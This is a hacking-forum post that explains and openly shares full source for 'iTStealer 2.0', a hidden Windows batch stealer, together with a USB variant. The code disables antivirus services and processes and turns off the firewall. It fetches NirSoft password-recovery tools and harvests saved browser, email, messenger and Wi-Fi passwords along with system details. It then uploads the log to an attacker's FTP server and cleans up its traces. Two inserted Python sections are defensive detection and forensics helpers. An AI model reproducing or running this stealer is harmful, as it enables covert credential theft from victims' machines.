Full application: http://evilzone.org/board/index.php/topic,59.0.html

Ok well, I love to help people with their batch files, and one of my most advanced batch files happens to be my iTStealer. Honestly I don't even use it anymore, but it was still fun to program (and I only ever shared it on EvilZone). I also have no problem making all of my sources open, and I welcome anyone to modify them as long as credit is given to the original authors. With a batch file, there are many different ways to accomplish the same end. At the end of this I am also going to post a modified version that does not use an FTP server (it's more for a USB Switchblade stealer that my dad coded based off of my source), which I believe is a good way to see how my source can be modified to add more functionality (although I believe he used my v1 source, which doesn't have my changes such as the nirsoft downloader or anything in the changelog). The original source can be found here in the archive. Anyways, on to business.
My new iTStealer 2.0 batch script has comments in it; however, I will go into detail about what each line of my code does and how it works, so that if you choose to modify my source, you have a better grasp of what I was trying to accomplish in my script.
@echo off
Title=iTStealer 2.0 by iTpHo3NiX
If you know what this means, you should be able to continue and follow along fairly well; if you have no clue what it means, you should look more into batch programming and come back later.
These two lines simply turn echo off, which means the command line (even though it's hidden) won't show the commands that have been run. If you are editing the source, you may want to turn echo on and add pauses so you can find any bugs, especially if it's not working. The next line simply sets the title. This is not really needed, though, as you're going to want to hide the window (I accomplished this with VBScript).
This next portion may seem pointless to most, but it helps protect the running of this application. It is a "virus stopper". I do not know the original author of this particular set, but it will stop some virus scanners in their tracks. It is also a 3-part process; let's start with part one.
:virusstopper
net stop ACKWIN32
net stop ADVXDWIN
net stop ALERTSVC
net stop ALOGSERV
net stop AMON9X
net stop ANTI-TROJAN
net stop ANTS
net stop apvxdwin
net stop ATCON
net stop ATUPDATER
net stop ATWATCH
net stop AUTODOWN
net stop AutoTrace
net stop AVCONSOL
net stop AVGCC32
net stop AVGCTRL
net stop Avgctrl
net stop AVGSERV
net stop AvgServ
net stop AVGSERV9
net stop AVGW
net stop avkpop
net stop AVKSERV
net stop avkservice
net stop avkwctl9
net stop AVP32
net stop AVP32
net stop AVPCC
net stop AVPCC
net stop AVPM
net stop AVPM
net stop Avsched32
net stop AVSYNMGR
net stop AvSynMgr
net stop AVWINNT
net stop AVXMONITOR9X
net stop AVXMONITORNT
net stop AVXQUAR
net stop AVXW
net stop BLACKD
net stop BLACKICE
net stop BlackICE
net stop CLAW95
net stop CLAW95CF
net stop CLEANER
net stop CLEANER3
net stop CMGRDIAN
net stop CONNECTIONMONITOR
net stop defscangui
net stop DEFWATCH
net stop DOORS
net stop DVP95
net stop EFPEADM
net stop ETRUSTCIPE
net stop EVPN
net stop EXPERT
net stop fameh32
net stop fch32
net stop fih32
net stop fnrb32
net stop fsaa
net stop fsav32
net stop fsgk32
net stop fsm32
net stop fsma32
net stop fsmb32
net stop gbmenu
net stop GENERICS
net stop GUARD
net stop GUARDDOG
net stop HELP
net stop IAMAPP
net stop IAMSERV
net stop ICLOAD95
net stop ICLOADNT
net stop ICMON
net stop ICSUPP95
net stop ICSUPPNT
net stop IFACE
net stop IOMON98
net stop ISRV95
net stop JEDI
net stop LDNETMON
net stop LDPROMENU
net stop LDSCAN
net stop LOCKDOWN
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop MCAGENT
net stop MCMNHDLR
net stop MCSHIELD
net stop McShield
net stop MCTOOL
net stop MCUPDATE
net stop MCVSRTE
net stop MCVSSHLD
net stop MGAVRTCL
net stop MGAVRTE
net stop MGHTML
net stop minilog
net stop MONITOR
net stop MOOLIVE
net stop MWATCH
net stop NAVAP
net stop navapsvc
net stop NAVAPW32
net stop NAVENG
net stop NAVEX15
net stop NAVLU32
net stop NAVW32
net stop NAVWNT
net stop NDD32
net stop NeoWatchLog
net stop NETUTILS
net stop ngdbserv
net stop NGServer
net stop NISSERV
net stop NISSERV
net stop NISUM
net stop NISUM
net stop NMAIN
net stop NORMIST
net stop NPROTECT
net stop NPSSVC
net stop NSCHED32
net stop ntrtscan
net stop NTVDM
net stop NTXconfig
net stop NVC95
net stop NVSVC32
net stop NWService
net stop NWTOOL16
net stop PADMIN
net stop pavproxy
net stop PCCIOMON
net stop pccntmon
net stop pccwin97
net stop PCCWIN98
net stop pcscan
net stop PERSFW
net stop POP3TRAP
net stop POPROXY
net stop PORTMONITOR
net stop PROCESSMONITOR
net stop PROGRAMAUDITOR
net stop PROT95
net stop PVIEW95
net stop RAV7
net stop RAV7WIN
net stop REALMON
net stop RESCUE
net stop RTVSCN95
net stop sbserv
net stop SCAN32
net stop SCRSCAN
net stop sharedaccess
net stop SPHINX
net stop SPYXX
net stop SS3EDIT
net stop STOPW
net stop SVW3
net stop SWEEP95
net stop SweepNet
net stop SWEEPSRV
net stop SWEEPSRV.SYS
net stop SweepUpdate
net stop SWNETSUP
net stop SymProxySvc
net stop SYMTRAY
net stop TFAK
net stop vbcmserv
net stop VbCons
net stop VET32
net stop VET95
net stop VETTRAY
net stop VPC32
net stop VPTRAY
net stop VSCHED
net stop VSECOMR
net stop VSHWIN32
net stop VSMAIN
net stop vsmon
net stop VSMON
net stop VSSTAT
net stop WATCHDOG
net stop WEBSCANX
net stop WGFE95
net stop WIMMUN32
net stop WRADMIN
net stop WRCTRL
net stop ZAPROMINILOG
net stop ZONEALARM
All of these commands use the "net" command. What it's doing is trying to stop services from running (in this case various anti-virus products), as most of them run as a service.
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
This part of the AV killer will try to kill the processes of various antivirus software; sometimes it works, sometimes it doesn't. It's kind of hit and miss.
echo %ProgramFiles%\alwils~1\avast4\*.* > nul
echo %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe > nul
echo %ProgramFiles%\kasper~1\*.exe > nul
echo %ProgramFiles%\trojan~1\*.exe > nul
echo %ProgramFiles%\f-prot95\*.dll > nul
echo %ProgramFiles%\tbav\*.dat > nul
echo %ProgramFiles%\avpersonal\*.vdf > nul
echo %ProgramFiles%\Norton~1\*.cnt > nul
echo %ProgramFiles%\Mcafee\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.* > nul
echo %ProgramFiles%\Norton~1\Norton~1\*.* > nul
echo %ProgramFiles%\Norton~1\*.* > nul
echo %ProgramFiles%\avgamsr\*.exe > nul
echo %ProgramFiles%\avgamsvr\*.exe > nul
echo %ProgramFiles%\avgemc\*.exe > nul
echo %ProgramFiles%\avgcc\*.exe > nul
echo %ProgramFiles%\avgupsvc\*.exe > nul
echo %ProgramFiles%\grisoft\*.* > nul
echo %ProgramFiles%\nood32krn\*.exe > nul
echo %ProgramFiles%\nood32\*.exe > nul
echo %ProgramFiles%\nod32\*.* > nul
echo %ProgramFiles%\nood32 > nul
echo %ProgramFiles%\kav\*.exe > nul
echo %ProgramFiles%\kavmm\*.exe > nul
echo %ProgramFiles%\kaspersky\*.* > nul
echo %ProgramFiles%\ewidoctrl\*.exe > nul
echo %ProgramFiles%\guard\*.exe > nul
echo %ProgramFiles%\ewido\*.exe > nul
echo %ProgramFiles%\pavprsrv\*.exe > nul
echo %ProgramFiles%\pavprot\*.exe > nul
echo %ProgramFiles%\avengine\*.exe > nul
echo %ProgramFiles%\apvxdwin\*.exe > nul
echo %ProgramFiles%\webproxy\*.exe > nul
echo %ProgramFiles%\panda software\*.* > nul
This last part will attempt to corrupt various functions of antivirus applications and has the highest chance of working if the service has been stopped and the application terminated. However, if it did not kill the antivirus, this part could stop it from working properly.
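From the defender's side, the three parts above are easy to spot statically: a script that issues "net stop" against a list of security-product service names, kills processes by wildcard with "tskill /A", or turns the firewall off with "netsh firewall set opmode disable" is doing defence tampering. The following triage scanner is an added example (not code from the original post or from the script's author); its watch list is a small subset of the service names in the list above, the regular expressions and scoring are my own assumptions, and both sample scripts are constructed for the demonstration.

```python
"""Static triage of a batch script for the defence-tampering patterns
described above: 'net stop' against known security-product service names,
'tskill /A' with wildcards, and 'netsh firewall set opmode disable'.
Added example, not code from the original post; the watch list is a subset
of the service names in the post and the sample scripts are constructed."""
import re

# Subset of the service names from the post's "net stop" list (lower-cased);
# a real deployment would load the full list from a file.
AV_SERVICE_NAMES = {
    "avp32", "avpcc", "mcshield", "navapsvc", "nprotect", "zonealarm",
    "blackice", "sharedaccess", "symproxysvc", "vsmon",
}

NET_STOP = re.compile(r"^\s*net\s+stop\s+(\S+)", re.I)
TSKILL = re.compile(r"^\s*tskill\s+/a\s+(\S+)", re.I)
FIREWALL_OFF = re.compile(r"^\s*netsh\s+firewall\s+set\s+opmode\s+disable\b", re.I)


def triage(script_text):
    """Return the suspicious lines found, grouped by pattern."""
    findings = {"net_stop_av": [], "tskill_wildcard": [], "firewall_disable": 0}
    for line in script_text.splitlines():
        m = NET_STOP.match(line)
        if m:
            if m.group(1).lower() in AV_SERVICE_NAMES:
                findings["net_stop_av"].append(m.group(1))
            continue
        m = TSKILL.match(line)
        if m:
            if "*" in m.group(1):
                findings["tskill_wildcard"].append(m.group(1))
            continue
        if FIREWALL_OFF.match(line):
            findings["firewall_disable"] += 1
    return findings


def verdict(findings):
    """Crude score (assumed thresholds): any firewall disable, or three or
    more stop/kill hits, is classed as defence tampering."""
    hits = len(findings["net_stop_av"]) + len(findings["tskill_wildcard"])
    if findings["firewall_disable"] or hits >= 3:
        return "defence-tampering"
    return "no-tampering-indicators"


# Constructed samples: a fragment in the style of the post, and a benign
# admin script that merely restarts the print spooler.
SAMPLE_TAMPER = """@echo off
net stop AVP32
net stop McShield
net stop sharedaccess
tskill /A av*
tskill /A nav*
tskill /A msiexec
netsh firewall set opmode disable
"""
SAMPLE_BENIGN = """@echo off
net stop spooler
net start spooler
"""

if __name__ == "__main__":
    for name, text in (("tamper", SAMPLE_TAMPER), ("benign", SAMPLE_BENIGN)):
        found = triage(text)
        print(name, verdict(found), found)
```

The scanner deliberately ignores the "echo path > nul" lines of the third part: they only write the path string to the NUL device and never touch the files, so they carry no signal. "net stop spooler" in the benign sample shows why the service name has to be matched against a watch list rather than flagging every "net stop".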
:nirsoft
wget --tries=3 http://www.nirsoft.net/utils/mspass.zip
wget --tries=3 http://www.nirsoft.net/utils/mailpv.zip
wget --tries=3 http://www.nirsoft.net/utils/iepv.zip
wget --tries=3 http://www.nirsoft.net/utils/passwordfox.zip
wget --tries=3 http://www.nirsoft.net/utils/chromepass.zip
wget --tries=3 http://www.nirsoft.net/utils/wirelesskeyview.zip
This part uses a third-party application, wget, a compiled binary that you will commonly see on Linux for downloading things via the CLI; it's the same program here, just ported to Windows. What this does is download some more third-party applications to the victim's machine, which, if the AV killer worked or if NirSoft does their job correctly, will come up FUD (Fully Undetectable).
set extract=C:\steal
This simple line sets the variable "%extract%" to a specific location. I use a specific location to ease cleanup. Some people are skeptics and point out that because I use "C:\", not all OSes are run on C; however, the computer will NEED a C drive, so whether the OS is loaded on C or not, it's still there and this will be able to use it.
cls
dir /b /s *.zip>zip.lst
for /f "delims==" %%i in (zip.lst) do (
echo %%~dpi
pushd "%%~dpi"
if not exist ".\%%~ni" md ".\%%~ni"
7z x "%%~nxi" -o".\%%~ni"
popd
)
del /f /q zip.lst
This is part of my EA-RCE. I really don't feel like explaining it, as it's hard for me to put what all this means into English. Just know that it's taking the files found in a directory [recursively] (in this case C:\Steal), creating a list file (zip.lst), and then using the list file for 7-Zip to unarchive them. It also checks to see whether the file has already been extracted.
cd chromepass
xcopy /y ChromePass.exe %extract%
cd..
cd iepv
xcopy /y iepv.exe %extract%
cd..
cd mailpv
xcopy /y mailpv.exe %extract%
cd..
cd mspass
xcopy /y mspass.exe %extract%
cd..
cd passwordfox
xcopy /y PasswordFox.exe %extract%
cd..
cd wirelesskeyview
xcopy /y WirelessKeyView.exe %extract%
cd..
cls
What this is doing is copying all of the EXEs that I'm going to be using to %extract% (aka C:\Steal).
rd /s /q chromepass
rd /s /q iepv
rd /s /q mailpv
rd /s /q mspass
rd /s /q passwordfox
rd /s /q wirelesskeyview
del /f /q chromepass.zip
del /f /q iepv.zip
del /f /q mailpv.zip
del /f /q mspass.zip
del /f /q passwordfox.zip
del /f /q wirelesskeyview.zip
cls
This is a little cleanup which removes the directories (rd) and then deletes the zip files (del).
systeminfo>c:\steal\system.txt
ipconfig /all>c:\steal\ip.txt
mem>c:\steal\memory.txt
net start>c:\steal\services.txt
ver>c:\steal\build.txt
tlntadmn>c:\steal\localhost.txt
net user>c:\steal\networkusers.txt
tasklist>c:\steal\tasklist.txt
schtasks>c:\steal\taskname.txt
mountvol>c:\steal\disks.txt
echo %time%>c:\steal\time.txt
echo %username>c:\steal\user.txt
echo %date%>c:\steal\date.txt
mspass.exe /stext c:\steal\mess.txt
mailpv.exe /stext c:\steal\mail.txt
iepv.exe /stext c:\steal\iepass.txt
PasswordFox.exe /stext c:\steal\firefox.txt
ChromePass.exe /stext c:\steal\chrome.txt
WirelessKeyView.exe /stext c:\steal\wireless.txt
This is the main function of the application; after it runs all of the other stuff, this is the big-ticket item. It runs various commands and makes several text documents with the information we are gathering.
set /a num=%random%
Here I am setting a new variable from a variable, if that makes sense, lol. With my beta and first release I had a dilemma where my file was at a point where it couldn't be spread. Why? Because if two computers shared the same name/username (i.e. Administrator), it would overwrite that file and I would no longer have a log for that particular computer. This is how I got around that problem. %random% generates a random number, and I store it in "%num%" because if I were to run %random% again (which would be needed for the FTP to send the file) I could not get the same random number back. So this fixes that problem, and it is very unlikely for random to generate the same number for the same username.
copy c:\steal\system.txt + c:\steal\ip.txt + c:\steal\memory.txt + c:\steal\services.txt + c:\steal\build.txt + c:\steal\localhost.txt + c:\steal\networkusers.txt + c:\steal\tasklist.txt + c:\steal\taskname.txt + c:\steal\disks.txt + c:\steal\time.txt + c:\steal\date.txt + c:\steal\mess.txt + c:\steal\mail.txt + c:\steal\iepass.txt + c:\steal\wireless.txt + c:\steal\firefox.txt + c:\steal\chrome.txt + c:\steal\user.txt c:\steal\%USERNAME%-%num%.txt
pushd C:\steal\
This simply merges all of those text files into one file named USERNAME-NUMBER and then changes directory to C:\steal.
netsh firewall set opmode disable
I had to throw this in because during my tests it would ask my permission before I could upload the file to the FTP server. This will disable that notification.
echo open ftpserver>ftp.iTp
echo user ftpusername>>ftp.iTp
echo ftppassword>>ftp.iTp
echo send %USERNAME%-%num%.txt>>ftp.iTp
echo bye>>ftp.iTp
This is the FTP information that will be used to send the file to the FTP server that is set. It simply uses echo to write out what the FTP client will do: first connect, then enter a username and password, then send the log and exit the FTP session.
ftp.exe -n -i -s:c:\steal\ftp.iTp
This uses ftp.iTp (simply a text file) to instruct the FTP client on what to do, in this case which FTP server to connect to and which file to upload to it.
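For an incident responder, that script file is the most useful artifact the stealer leaves behind: because "ftp -n" suppresses auto-login, the file has to carry the host, the account, the password on the bare line after "user", and the file name sent, so a recovered copy tells you exactly where the log went. The parser below is an added example (not code from the original post or its author); the command set it recognises is my assumption about what such a script contains, and the sample content uses constructed placeholder values.

```python
"""Parse an ftp.exe command script (the ftp.iTp file above) to recover where
a log was sent. Added example, not code from the original post. With
'ftp -n', the script supplies 'open <host>', 'user <name>', the password on
the next bare line (or on the 'user' line itself), one or more
'send'/'put'/'mput' lines, and 'bye'. The sample content is constructed
with placeholder values."""


def parse_ftp_script(text):
    """Return host, user, whether a password was present, and the files
    uploaded. The password value itself is not returned, only its presence,
    so the summary can go into a ticket without spreading a credential."""
    result = {"host": None, "user": None, "password_present": False, "sent": []}
    expect_password = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_password:
            # The line after 'user <name>' is the password, not a command.
            result["password_present"] = True
            expect_password = False
            continue
        parts = line.split(None, 1)
        cmd = parts[0].lower()
        arg = parts[1].strip() if len(parts) > 1 else ""
        if cmd == "open":
            result["host"] = arg
        elif cmd == "user":
            user_parts = arg.split(None, 1)
            result["user"] = user_parts[0] if user_parts else None
            if len(user_parts) > 1:
                # 'user name password' on one line: no separate password line.
                result["password_present"] = True
            else:
                expect_password = True
        elif cmd in ("send", "put", "mput"):
            result["sent"].append(arg)
        elif cmd in ("bye", "quit"):
            break
    return result


def summarize(result):
    """One-line description suitable for an incident timeline."""
    files = ", ".join(result["sent"]) or "(no files)"
    return "%s@%s <- %s" % (result["user"], result["host"], files)


# Constructed sample in the shape the post's echo lines produce; the host,
# account and file name are placeholders, not real indicators.
SAMPLE_FTP_SCRIPT = """open ftp.example.invalid
user dropbox_user
placeholder-password
send Administrator-12345.txt
bye
"""

if __name__ == "__main__":
    parsed = parse_ftp_script(SAMPLE_FTP_SCRIPT)
    print(parsed)
    print(summarize(parsed))
```

Run against the sample, the summary reads "dropbox_user@ftp.example.invalid <- Administrator-12345.txt"; the host is the value to block at the egress firewall and to pivot on in proxy or NetFlow logs, and the "-<number>" suffix on the file name comes from the %random% trick described above.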
del /f /q *.*
popd
pushd C:\
if exist steal rd /s /q steal
popd
pushd %temp%
del /f /q *.exe
del /f /q *.bat
del /f /q *.vbs
del /f /q *.iTp
popd
This is another cleanup to remove the files used.
pushd "%temp%"
if exist stealer rd /s /q stealer
popd
Just a little bonus cleanup.
So that is my iTStealer and everything it does. As I said above, I used a VBScript to hide the console window. My VBScript to accomplish that is this:
set objShell = CreateObject("WScript.Shell")
objShell.Run "iTStealer2.0.bat", vbHide, TRUE
Then I run start.vbs to initiate the whole thing, and it will completely hide the console window while it does its thing.
As promised, here is an alternate script (which will also require the NirSoft tools). I haven't exactly looked through his script, but it will get pretty much the same information and then put it in a text file in the directory from which it is run. It's also still a work in progress, but I haven't really been talking to him. This is just an example of how you can modify my source.
title myst
cmdow myst /hid
@echo off
cd..
set mytmp=%cd%
cd myst
set mydrv=%cd%
rem Date and time
echo Date: %date% Time: %time%>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Current username
echo %username% | find /v /i " command completed ">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Windows version information
ver>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Main system info
systeminfo | find /v /i "file 1">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Programs in memory
mem>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Mount points
mountvol | find /v /i "/" | find /v /i "path" | find /v /i "point." | find /v /i "target" | find /v /i "reside">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Services that are running
net start | find /v /i " command completed ">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Programs in the tasklist
tasklist>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Local accounts on computer
net user | find /v /i " command completed ">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem As long as site doesnt change we can get the external ip
cscript getip.js | find /i "hostname">%systemdrive%\extip.lst
for /f "tokens=1,2*" %%i in (%systemdrive%\extip.lst ) do (
if "%%i"=="<p><b>Hostname</b>:" echo %%j>%systemdrive%\realip.lst
)
for /f "tokens=1,2,3,4* delims=.-" %%i in (%systemdrive%\realip.lst ) do (
echo Real XTWAN IP: %%i.%%j.%%k.%%l>>%systemdrive%\system.lst
echo iNet Provider: %%m>>%systemdrive%\system.lst
)
if exist %systemdrive%\extip.lst del %systemdrive%\extip.lst
if exist %systemdrive%\realip.lst del %systemdrive%\realip.lst
type blank.txt>>%systemdrive%\system.lst
rem Local network information
ipconfig /all>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Telnet admin information
tlntadmn>%systemdrive%\local.lst
for /f "tokens=1,2* delims==:" %%i in (%systemdrive%\local.lst ) do (
echo %%i %%j %%k>>%systemdrive%\system.lst
)
rem Scheduled tasks
schtasks>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem What programs are installed
if exist %systemdrive%\"program files" dir /b /ad %systemdrive%\"program files">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Extra addon for 64bit machines
if exist %systemdrive%\"program files (x86)" dir /b /ad %systemdrive%\"program files (x86)">>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Saved microsoft passwords
mspass.exe /stext %systemdrive%\mess.lst
type %systemdrive%\mess.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Saved email passwords
mailpv.exe /stext %systemdrive%\mail.lst
type %systemdrive%\mail.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Internet explorer saved passwords
iepv.exe /stext %systemdrive%\iepass.lst
type %systemdrive%\iepass.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Firefox saved passwords
PasswordFox.exe /stext %systemdrive%\firefox.lst
type %systemdrive%\firefox.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Mozilla chrome saved passwords
ChromePass.exe /stext %systemdrive%\chrome.lst
type %systemdrive%\chrome.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
rem Saved wireless keys
WirelessKeyView.exe /stext %systemdrive%\wireless.lst
type %systemdrive%\wireless.lst>>%systemdrive%\system.lst
type blank.txt>>%systemdrive%\system.lst
cd..
if exist "%mydrv%\%computername%" del /f /s /q "%mydrv%\%computername%"
rem if not exist "%mydrv%\%computername%" md "%mydrv%\%computername%"
pushd %systemdrive%\
move /y system.lst "%mytmp%\%computername%.txt"
del /f /q *.lst
popd